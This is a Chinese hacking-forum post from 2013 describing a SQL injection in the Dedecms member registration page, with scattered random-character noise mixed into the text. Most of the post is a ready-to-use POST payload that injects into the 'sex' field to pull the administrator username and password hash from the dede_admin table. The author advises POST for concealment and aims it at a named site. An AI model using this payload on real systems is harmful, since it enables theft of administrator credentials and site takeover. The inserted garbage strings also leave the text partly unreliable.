找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1973|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞类型: SQL注射漏洞- s9 g9 g8 a) y! h' [
简要描述:
" c4 y: N. Q+ f% O7 J: F* s! w3 t1 ~
" s3 I5 V' E2 j& K* v0 h6 c+ M( ^需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
  c$ S& Z, U+ E" J; E& c原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.9 N7 _" M6 j9 x1 R. j" q
详细说明:跟这个漏洞- ^/ P8 o4 M4 X8 M  C+ L

3 t: V0 e% u6 ~+ n: V5 w: H) FWooYun: Dedecms SQL注射导致审核机制绕过漏洞
# p% M7 s, m. o: v是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.8 u; m5 X1 ?+ ^
POST提交以下数据,其实不用POST提交的,这样隐蔽点.3 I- R% Z0 j5 w+ j" X* y* u8 g3 C

) n1 z& k* k$ p7 Zwww.political-security.com/member/reg_new.php* M) D2 p% `1 O) Y
7 I& j. b) t0 a
POST/ S* Z7 t$ j9 R, ]" Y3 e

/ B0 F- X; ]- K- T  j* Y; Odopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&) m  @' C1 Y8 h8 g) }1 Q
userid=c4rp3nt3r&uname=c4rp3nt3r
! |# P' `0 u4 D! p8 ^0 U1 o&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
# u! Z& l. d' P8 o3 e&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
6 z6 T" A4 Z6 [7 E. a3 b0 w(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
0 j& w; g/ S. R3 F%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表